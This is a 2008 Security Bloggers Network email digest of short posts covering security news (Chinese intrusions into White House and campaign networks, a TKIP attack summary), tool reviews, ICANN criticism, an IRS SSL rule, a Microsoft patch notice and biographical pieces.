Posted: 08 Nov 2008 06:56 AM CST
In Part I of this week's episode we are joined by Bill Brenner, talking to us and the listeners about the best ways to sell security to upper management.
In Part II we discuss stories and bring on none other than Josh Wright to talk about some of the latest attacks against TKIP.
We are still working on the sound quality problems, swapped out a few cables this week and it helped. The intro to the show is messed up and Larry and I are only on the left channel, this does NOT persist throughout the entire episode. Please bare with us while we work towards better sound quality.
Posted: 08 Nov 2008 04:14 AM CST
US officials say Chinese hackers have raided White House email archives multiple times, according to a report. The Financial Times reports some people it describes as "US government cyber experts" suspect the raids were sponsored by the Chinese regime. "We are getting very targeted Chinese attacks so it stretches credulity that these are not directed by government-related organisations," an unnamed source opined. Each attack cracked the unclassified network's defences for a short time. The classified network remained secure, we're assured by the FT's whispers. "For a short period of time, they successfully breach a wall, and then you rebuild the wall ... it is not as if they have continued access. It is constant cat and mouse on this stuff," the source reportedly said. The FT's revelations came just days after Newsweek reported that both the Obama and McCain campaigns had been hacked from overseas, with large amounts of data downloaded, apparently in an attempt to track the candidates' evolving policy positions. This could of course potentially help the unnamed foreign entities in future negotiations. The campaign attacks were picked up by the authorities, with the FBI and the Secret Service notifying the Obama campaign back in August that what staffers thought was a virus was something more sinister. "You have a problem way bigger than what you understand," an FBI agent reportedly told Obama staff members. "You have been compromised, and a serious amount of files have been loaded off your system." –White House network pwned 'multiple' times by Chinese • The Register
Posted: 08 Nov 2008 03:57 AM CST
Where in the world does the average citizen spend just two hours a week online? An isolated backwater, perhaps? Or maybe netizen figures from a far-off land trapped in a time bubble of its own desiring? Well, close. This bastion of digital indifference is Italy, one of our closest neighbours, a super-rich G7 nation and homeland to the inventors of the telephone and radio. –This is social networking, Italian style - The Guardian - Will someone please take care of this, instead of debating suntan? Thanks!
Posted: 08 Nov 2008 03:54 AM CST
Posted: 08 Nov 2008 03:52 AM CST
Death stands before me today like the hope of health for a sick man, like stepping out into the open air after a time of suffering. Death stands before me today like the aroma of incense, like sitting under the sail on the Day of the Great Wind. Death stands before me today like the odor of lotos-blossoms, like the first moments on the edge of sweet drunkenness. Death stands before me today like the end of a long rain, like the homecoming of a soldier a long time at war. Death stands before me today like the clarity of heaven, like the answer long-desired to a heavy riddle. And Death stands before me today like the way a man feels about home after he has spent many years in bondage. –"Dispute of A Man with His Ba", a text from a papyrus manuscript [Berlin 3024] of the 12th Dynasty, ca. 1800 B.C.E.
Posted: 08 Nov 2008 02:45 AM CST
Odd Title... but it's 3:30am.
The first thing I wanted to mention was KiTTY ( via /dev/random). It's a fork of PuTTY, which is nice given PuTTY is on a rather slow development cycle, and new features are almost non-existent. Some of the features include folders within the saved sessions box (although, not implemented as "friendly" as they could be), transparency (this didn't work for me), login scripts (also didn't work for me) and integrated scp support. The features list is actually quite a bit longer than that, feel free to read it on the KiTTY website. As mentioned, a number of the features didn't work for me. I'm going to give it a try on a second computer before I rule it out, but I wanted to mention it now. A second bad experience would most likely lead to me never using it or mentioning it here, and it may work wonderfully for others.
The second thing I wanted to mention is that Komodo Edit 5.0 (the free version of Komodo IDE) is now available. Some of the biggest things are limited to Komodo IDE unfortunately, such as Source Code Checkout capabiliies and the ability to "beautify" your code. It does provide some UI clean-up and an update to Firefox 3.0 in the Edit version though.
Posted: 07 Nov 2008 09:37 PM CST
So courtesy of the folks at SC Magazine and the Security Bloggers Network here is a great offer to attend a great security conference. This offer is for the inaugural SC World Congress this December 9-10, at the Javits Center in NYC. The show has a great schedule and an "A" list of speakers lined up. Unfortunately (or fortunately depending on how you feel about it) no vendors will be speaking, only "real experts", so you won't hear from the likes of me or other vendor pukes.
With the economy the way it is, I know many of you are probably finding it difficult to get buget to pay to attend conferences, not to mention budget for travel and expenses. With so many folks in the metro NYC area, SC World Congress is a great chance to get some top notch sessions in. So here is a way to make it a bit more affordable. If you would like to attend the SC World Congress, here is a quick 35% off! Just use Blog1(for a one day pass) or Blog2 (for a two day pass) in the special offers section when you register for the show.
There you go, what a deal! I will be at the show as will StillSecure. If you are attending, come by and say hello! Hope to see you there.
Posted: 07 Nov 2008 08:01 PM CST
Posted: 07 Nov 2008 04:07 PM CST
I think it is very likely that network infrastructure will be transformed in coming years by new levels of automation and connectivity intelligence driven by demands from new IT initiatives, from RFID to collaboration, data center virtualization and even cloud computing. I think we'll call this transformed network infrastructure 2.0. The following are recent blogs [...]
Posted: 07 Nov 2008 01:42 PM CST
I have been taking a look at the security industry lately as I get back into being a full time analyst. Preliminary results indicate that about 30% of 1,200 companies I tracked two years ago have either been acquired or have quietly disappeared. Anyone who has followed this blog over those years knows that I often object to calling this industry consolidation.
Posted: 07 Nov 2008 01:03 PM CST
A friend of a friend of mine is an IT consultant that works with many companies (for the sake of blog anonymity, let's call him Steve). At a party last weekend, Steve mentioned that most of his customers are not very large - in fact, some are small brick-and-mortar shops. Regardless of size, they all have two things
Posted: 07 Nov 2008 10:27 AM CST
Posted: 07 Nov 2008 10:23 AM CST
John Pescatore is right when he says that talking about less regulation at this time seems to be not aligned with the current crysis, but the article he is pointing to is very precise on saying that the costs from SOX are pretty high and, as we could see, it wasn’t able to prevent cases like Bear Sterns, Lehman Bros., AIG and Merrill Lynch. Accountants are as creative as lawyers, they will always look for breaches in the controls (lawa) to do their magic.
SOX brought a lot of money to Information Security, but it also brought some directed focus on some controls that are not always the most required for all organizations. It would be nice to see a review of the law, verifying its results and actual costs.
Posted: 07 Nov 2008 10:18 AM CST
Now that the presidential race is over Newsweek is reporting that the US Government, through the FBI and Secret Service, notified the Obama and McCain campaigns that their computers had been compromised and sensitive documents copied.
This information demonstrates that the US government has a sophisticated intrusion detection capability. This is likely part of the NSA internet surveillance system that was made public by an AT&T technician in 2006.
It is likely that the system has a set of watch IP ranges that are sensitive from a national security perspective. The campaigns’ computers were probably on this list. The traffic between foreign IP addresses and these watch IPs is then scrutinized for espionage. The pattern of activity flagged would be Microsoft Office documents and PDFs being retrieved or other intruder signs such as an encrypted tunnel with a foreign endpoint.
This shows that the US Government has the capability to detect some types foreign attacks although they probably have to be selective of the IP ranges they monitor. It’s nice to know that if the White House computers were leaking documents to China or Russia that there is some detection capability, but the fact that this is done at the Internet backbone level means any IP could be targeted and it might not just be to look for foreign intrusions.
Posted: 07 Nov 2008 09:58 AM CST
A lot of noise about a new research that “cracked” WAP was made this week. Well, there are more details about it today, and they clearly show that the WAP sky is not falling.
There is a very good abstract of what is happening on the article above:
“To describe the attack succinctly, it’s a method of decrypting and arbitrarily and successfully re-encrypting and re-injecting short packets on networks that have devices using TKIP. That’s a very critical distinction; this is a serious attack, and the first real flaw in TKIP that’s been found and exploited. But it’s still a subset of a true key crack.”
So, it’s not the final attack against WAP protected networks, but it is a very important building block for more elaborate attacks. I can see that in a near future we will see more serious stuff being done using this as a starting point. Keep your ears open.
Posted: 07 Nov 2008 09:32 AM CST
A Financial Times article discusses multiple security compromises in the Whitehouse network. Heike blogged already about both President-Elect Obama’s and Senator McCain’s campaign networks were compromised by foreign hackers as well. The network of my precinct committee chairperson is next. From the article:
As usual, the article is slim on technical details and fills in the space with general cybersecurity background. At this point, it may be easier to list the government organizations that haven’t been compromised by Chinese hackers.
Posted: 07 Nov 2008 08:58 AM CST
I've written about the link between NAC and MSP before, and the success of NAC in the higher education market is certainly no secret. More and more of our higher ed customers have been talking lately about outsourcing their residential networks. This seems to make sense on a number of levels, provided that the schools can work out a structure for the support as well as engineering and maintenance of the residential network. Certainly, it makes sense to have NAC as an integral part of the managed resnet service, but it also has the potential to go much farther than that, including services like voice and on-demand video in addition to data. Network Vigilance, a company based in San Diego, CA, provides managed NAC services today. Another company based here in Austin, Apogee has managed residential services as their primary business function and seems to be making a go of it (except for the domain name, seriously..).
Despite the macro economic conditions (and perhaps because of them), I think this has real growth potential. Having what amounts to a specialized MSP provided authenticated, well-governed network access to residential halls, freeing on-campus network staff to focus more on backbone services, and providing school administrators with a predictable cost structure that can be baked into the cost of the dorm room seems to make sense for everyone. Just don't forget the "authenticated, well-governed" part.
Posted: 07 Nov 2008 08:30 AM CST
Posted: 07 Nov 2008 08:21 AM CST
Further Evidence Pointing To ICANN Failures
News today, from our friends at KnujOn of failed attempts (due to intervention by ICANN officials) to bring reports of nefarious criminal activity within the Domain Registrar accreditation system to ICANN.
Infosecurity.US is calling for law enforcement to investigate this issue, and the participatory actions of ICANN officials, whom appear, anecdotally, to be quite pleased with the current status, regardless of evidence pointing to potentially surreptitious domain registrar accreditation data. The full KnujOn posting appears after the break.
From the post: “KnujOn Censored at ICANN Session“
In an unusual and shocking move Dr. Robert Bruen was interrupted and silenced at an open, cross-function ICANN meeting in Cairo Monday. At a meeting entitled: “ Open Joint Session (GNSO, ccNSO, GAC, ALAC): Domain Name Space" Dr. Bruen was handed the microphone in the question and answer portion. As he began speaking about the problems of compliance and the need for better controls within the expanding Internet, specifically in relation to criminal infiltration of the Domain Name space, Patrick Sharry (ICANN ccNSO Consultant) stopped Dr. Bruen and said: “I don’t want to pursue it any more in this forum.” Chris Disspain (CEO of Australian Domain Administration) followed this rare dismissal by saying: "[if] it turns into an open microphone, then I, for one, won’t be supporting it again." Meaning he would no longer support question and answer portions at ICANN sessions.
This was quite a shock after several other attendees were able ask lengthy questions uninterrupted. However, Dr. Bruen should have known he was walking on thin ice. Once he introduced himself as a KnujOn representative Patrick Sharry told him to "keep it brief."
This is somewhat reminiscent of Peter Dengate-Thrush's response to questions from KnujOn's Garth Bruen at the Washington D.C. ICANN Session entitled: "Improving Institutional Confidence consultation" KnujOn brought up issues of criminality, contract violations, and exclusion of the Internet consumer. Dengate-Thrush admonished Bruen that "this was not relevant to institutional confidence." Later at this same session Dengate-Thrush told the audience that he did not "want to hear from any more angry IP lawyers." Many of the attendees were attorneys representing brand holders being exploited by cyber-squatters and counterfeiters. The Intellectual Property community expressed its feeling of being marginalized by ICANN in favor of shadowy criminal interests.
So, as at the Cairo meeting, open forums only seem open if the panel wants to hear the question. The summary dismissal of Dr. Bruen can only be seen as prejudiced as it violates Sharry's own ground rules for the session:
Dr. Bruen's unasked and unanswered question concerned the fact that since the existing compliance structure is inadequate, how can ICANN ensure contractual compliance is enforced in a rapidly expanded Internet? Furthermore, Sharry opened the session with this commitment:
"We will try, as we do that, on the way through, to involve a little bit of at least conversation, if not a little bit of conflict or argument or heated debate or discussion or something like that is(sic) well. And we will see how we go then, bringing the audience into that conversation."
But, as we can see no debate or discussion was allowed. Since the serious issue has emerged of Registrar Secrecy, we simply want to know if this will be allowed to continue within the new Doamin Registrar space or will common-sense policy be implemented. If the issues of contract violations, criminality in the Registrar community, and exclusion of the consumer are not relevant to improving institutional confidence, then what is?
KnujOn will be contacting Sharry and Disspain directly, as well as ICANN's Ombudsman, to get a better explanation. We are speaking on behalf of the consumer and wont be silenced.
Posted: 07 Nov 2008 07:42 AM CST
Infosecurity.US continues our Genius Series with an obvious choice of subject boffins, this time, Alan Mathison Turing, Ph.D. OBE, FRS.. Dr. Turing ( 23 June 1912 - 7 June 1954 ) was a British mathematician and cryptographer, considered to be one of the fathers of modern computer science, and a significant figure in the Allies successful cracking of Nazi Germany’s cryptographic work, thereby bring a swifter end to World War II. Further information including a couple of short videos, appear after the break.
From The :”Encyclopedia of World Biography“
The British mathematician Alan Mathison Turing (1912-1954) was noted for his contributions to mathematical logic and to the early theory, construction, and use of computers.
Alan Turing was born in London, England, on June 23, 1912. Both his parents had upper middle class origins, and his father continued that tradition as an administrator in the Indian civil service. With his father off in India, Turing was sent away to private boarding schools. After some early problems with social adjustment, he distinguished himself in mathematics and science.
Turing’s exceptional mathematical abilities were first generally recognized in his college years (1931-1936) at King’s College of Cambridge University. His most important mathematical work, “On Computable Numbers,” was written in Cambridge in 1936. In this paper Turing answered a question of great significance to mathematical logic–namely, which functions in mathematics can be computed by an entirely mechanical procedure. His answer was phrased in terms of a theoretical machine (today known as the “Turing machine”) which could mechanically carry out these computations. Embodied in the Turing machine idea is the concept of the stored program computer.”
Posted: 07 Nov 2008 07:41 AM CST
Infosecurity.US carries on with our Heroes Series, focusing this time on Legion of Merit with Combat Distinguishing Device recipient Juan Ayala, COL, USMC. He was awarded the Legion of Merit for efforts in building up the 1st Iraqi Army Division, thereby assisting in protecting the lives of fellow Marines, other service members in-theater, colleagues in the Iraqi Army and Iraqi citizenry.
A secure Iraq requires competent local police and national army. In Iraq, U.S. commanders have helped achieve stability in former hotbeds of violence by building up Iraqi Security Forces, thanks to the creative efforts of soldiers and Marines, such as Marine Corps Col. Juan Ayala.
During his third tour in Iraq, from January 2006 to January 2007, Col. Ayala served as the Senior Advisor to the 1st Iraqi Army Division, based at Camp Habbaniyah. Numerous challenges faced Ayala and his 29-man team, as they operated daily in tandem with the Iraqis. The Division lacked soldiers, trained officers and equipment. The surrounding terrain proved hostile as well. In early 2006, Anbar province remained volatile, and the Iraqi Army often found itself engaged in battles with civilians allied with insurgents.
Over time, under Ayala's guidance, the Iraqis increased their areas of responsibility and gained credibility among the population. Specifically, Col. Ayala revamped the staff functions of the Division, drawing up missions that fit its skill set. He collaborated with local imams and sheiks to obtain approval for operations. As a result of the built-up trust, the flow of actionable intelligence to the Division increased, as did the number of formerly hostile Sunnis to the Division's ranks. So many ended up joining the Iraqi forces that they eventually gained a title: the "sons of Al Anbar."
Ayala helped plan and execute 52 direct action patrols in the area, which yielded 25 captured insurgents. Ayala's input resulted in the creation of a 24-hour joint Iraqi/Advisor Combat Operations Center, which helped obtain situational awareness on the ground. Other positive developments under Ayala's tenure included equipment improvements and the purging of hundreds of bogus soldiers from the Division's ranks. Under Ayala, the implementation of a Unit Tracking Program (UTP) was influential in maintaining accountability among the Iraqi soldiers in the Division.
Ayala often went on patrols, serving as a vehicle and convoy commander. He was hit twice by IEDs, but kept going out on missions to assess the Division's ability in the field. He led 17 teams and 225 advisors at different levels of command, to improve the capabilities of the Division. Today, two of the Division's Brigades, the 3rd and the 4th, function without coalition assistance.
For his efforts in building up the 1st Iraqi Army Division, Col. Ayala earned the Legion of Merit with Combat Distinguishing Device.
Posted: 07 Nov 2008 04:18 AM CST
This requirement applies to Authorized IRS e-file Providers participating in Online Filing of individual income tax returns that collect taxpayer information via the Internet. These Providers shall possess a valid and current Extended Validation Secure Socket Layer (SSL) certificate using SSL 3.0 / TLS 1.0 or later, and minimum 1024-bit RSA / 128-bit AES.
This passage refers to the service that may be offered by sites whereby you can file your taxes directly online from your own computer. The e-file program offers free filing to individual taxpayers with household income under a certain threshhold ($54,000 in 2007) and for-fee filing to any individual. (It also offers filing services to businesses and the self-employed, but those groups are outside this requirement, at least for 2009.) You may recall that online tax scams, including phishing attacks, have run rampant during the past two tax seasons. I believe that's what motivates this decision by the IRS, which seeks to offer e-filing to the populace in a widespread and egalitarian way while minimizing the individual's risk of identity theft.
Posted: 07 Nov 2008 03:58 AM CST
看完皓月所写的"防火墙、UTM产品OEM第三方产品或嵌入第三方反病毒引擎的利弊分析"，掩卷而思，这些观点印证了前些天和朋友们探讨的若干观点。近几年，防火墙和入侵检测系统IDS演变到防火墙FW、入侵防御系统IPS和统一威胁管理UTM系统的三国争霸，UTM将会代替防火墙的声音获得了不少关注。从皓月的这篇文章中，你能发现很多更深层次的思索。与这几年的安全运营经验匹配，下面三点可能会对FW/IPS和UTM之争产生相当大的影响： 位置和策略的合理性：网关位置对抗恶意代码不是一劳永逸的，一方面恶意代码的最终目标并不是网关，而是在网关之后内网内的各类终端节点，而单纯的依赖网关防毒，则会造成"单点突破，全局沦陷"的现象出现；另一方面，恶意代码无法单独存在，势必要通过各类行为（如：扫描、攻击、窃取等）扩散其影响，而这些行为对于现有直路带基于文件代理方式静态匹配的病毒功能的防火墙以及UTM设备来说，是根本无法检测的； 升级频率的差异化：传统的防火墙理论上是一个稳定的面向策略的高性能安全功能组件，通过策略的配置、变更来起到安全控制；其最坏的情况下即使不能够确保预定义的安全策略有效执行，也可以通过全部阻断方式切断网络出口连接。换句话说，即使无法对内网内的威胁作出响应，也可以使之不通过网络出口进一步扩散。对于反病毒来说，其是一个可变的面向恶意代码对象的易扩展安全功能组件，特征库的升级、程序模块的升级频率远高于防火墙类安全产品的升级。对于UTM产品来说，其统一化的功能架构为新功能的扩充打下了基础，但这并不是一个简单的堆叠、加法过程，相反，当可变的功能组件与稳定的功能组件发生同处于一个硬件及部署位置时，就会导致每个功能都会大打折扣，而反病毒引擎的不稳定概率是最高的。 运维管理的特殊性：对于IT管理者来说，其最根本的目标是保障业务的连续性不受破坏，那么在网络出口直连的带防病毒功能的防火墙、新型UTM设备如果频繁的升级、变更安全策略，势必会引入一定的风险，而致使业务的可用性受到很大的损害，那么是得不偿失的。 - 点击下载原文(pdf) -。 Share To:
Posted: 07 Nov 2008 01:49 AM CST
Posted: 06 Nov 2008 07:19 PM CST
Microsoft Corporation (NasdaqGS; MSFT) has released advanced notification of it’s famous Patch Tuesday effort (now slated for November 11, 2008 (Veterans Day in the United States, and Remembrance Day in Canada) - probably not the best choice of days to release major security patches….
The full text of the notification appears after the break.
Microsoft Security Bulletin Advance Notification for November 2008
Microsoft Security Bulletin Advance Notification for November 2008
Issued: November 6, 2008
This is an advance notification of security bulletins that
The full version of the Microsoft Security Bulletin Advance
This bulletin advance notification will be replaced with the
To receive automatic notifications whenever Microsoft Security
Microsoft will host a webcast to address customer questions on
Microsoft also provides information to help customers prioritize
This advance notification provides the software subject as the
Critical Security Bulletins
Windows Bulletin 1
- Affected Software:
- Impact: Remote Code Execution
Important Security Bulletins
Windows Bulletin 2
- Affected Software:
- Impact: Remote Code Execution
Posted: 06 Nov 2008 03:36 PM CST
With the recent release of v5 of the Security Intelligence Report, I decided to produce a couple of webcast videos where I present my findings to you directly in a brief presentation. In this first one, I go over the industry-wide trends.
Best regards, Jeff
Posted: 06 Nov 2008 03:07 PM CST
I stare in disbelief...
This posting includes an audio/video/photo media file: Download Now
|You are subscribed to email updates from Security Bloggers Network |
To stop receiving these emails, you may unsubscribe now.
|Email Delivery powered by FeedBurner|
|Inbox too full? Subscribe to the feed version of Security Bloggers Network in a feed reader.|
|If you prefer to unsubscribe via postal mail, write to: Security Bloggers Network, c/o FeedBurner, 20 W Kinzie, 9th Floor, Chicago IL USA 60610|